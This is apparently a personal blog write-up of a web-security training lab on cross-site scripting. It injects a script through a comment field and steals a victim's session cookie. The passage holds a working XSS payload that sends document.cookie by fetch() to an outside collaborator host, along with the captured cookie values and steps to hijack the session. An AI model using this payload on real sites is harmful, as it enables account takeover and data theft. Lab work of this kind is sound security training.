mm0@home:~$

Archive

About

RSS

[xss] lab exploiting cross Site scripting to steal c7460569095645e4911bbe798bd70588

[XSS] Lab: Exploiting cross-site scripting to steal cookies

Untitled

all other fields are filtered but in the comment filed we can inject

Untitled

Untitled

Untitled

since we were able to inject 

<script>
alert(document.cookie);
</script>

but since we need to exfiltrate the cookie we can use a variable and burp collaborator.

Untitled

<script>
	var ckie = document.cookie 
  let colab = `tif8tzv0frnz6llnlkaxlj37hynpbfz4.oastify.com/?${encodeURIComponent(ckie)}`;
  // Sending the GET request
  fetch(colab)
</script>

Untitled

now that we can see what the request was.

if we decode the request from URL encoding

/?secret=urml14vXd4SlfFb8LXi7k8Vy6YUtJVpV; session=gDc7Q2pfaagxWQr0qoGsajDsR9xSBRO2

so now to impersonate that user we simple just need to change our own cookie to there’s

I will use the browser for this but we can also use burp suite repeater for it.

using cookie manager extension:

Untitled

and then lets just refresh our page:

Untitled